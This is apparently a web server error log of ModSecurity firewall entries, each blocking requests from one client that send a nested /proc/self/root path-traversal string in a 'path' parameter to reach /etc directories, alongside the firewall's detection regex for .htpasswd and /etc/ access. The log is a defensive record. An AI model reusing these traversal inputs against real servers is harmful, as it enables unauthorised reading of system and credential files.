[Mon Mar 16 17:39:47.868120 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.241.46:45676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqks_BxrYCr4hPDw8DsQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:49.230353 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:36998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqldSswJuvopo3lOh4BgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:50.579436 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:37012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqlrysWC90G-1nBrBd0gAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:51.737904 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:37024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhql6QpVkWug9HeOt9N0QAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:52.994239 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:37034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqmKQpVkWug9HeOt9N0gAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:54.240582 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:37038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqmkr9dMAiw-8KANNi8QAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:56.218165 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.244.31:33792] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhqnLysWC90G-1nBrBd2QAAAYg"]
[Mon Mar 16 17:39:56.595224 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:37040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqnM_BxrYCr4hPDw8DvQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:57.893546 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:37042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqnaQpVkWug9HeOt9N1AAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:39:59.088028 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:59094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqn8_BxrYCr4hPDw8DvgAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:00.351587 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:59106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqoP9ocpUE4ed4uDwMWAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:01.946324 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.241.46:59120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqoUr9dMAiw-8KANNi9QAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:03.711068 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:59122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqo0r9dMAiw-8KANNi-AAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:04.812466 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:59128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqpKTCbgAP5jq5TehFSAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:06.159813 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.241.46:59130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqps_BxrYCr4hPDw8DwgAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:07.391585 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:59142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqp6QpVkWug9HeOt9N7AAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:09.948336 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:57028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqqKQpVkWug9HeOt9N7gAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:11.268019 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:57030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqq6QpVkWug9HeOt9N8gAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:12.448941 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:57036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqrI6lpbStxTqkSkuDbQAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:13.690965 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:57052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqrdSswJuvopo3lOh4IAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:15.038963 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:57066] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqr6QpVkWug9HeOt9N9QAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:40:16.196391 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:57080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhqsM_BxrYCr4hPDw8DwwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
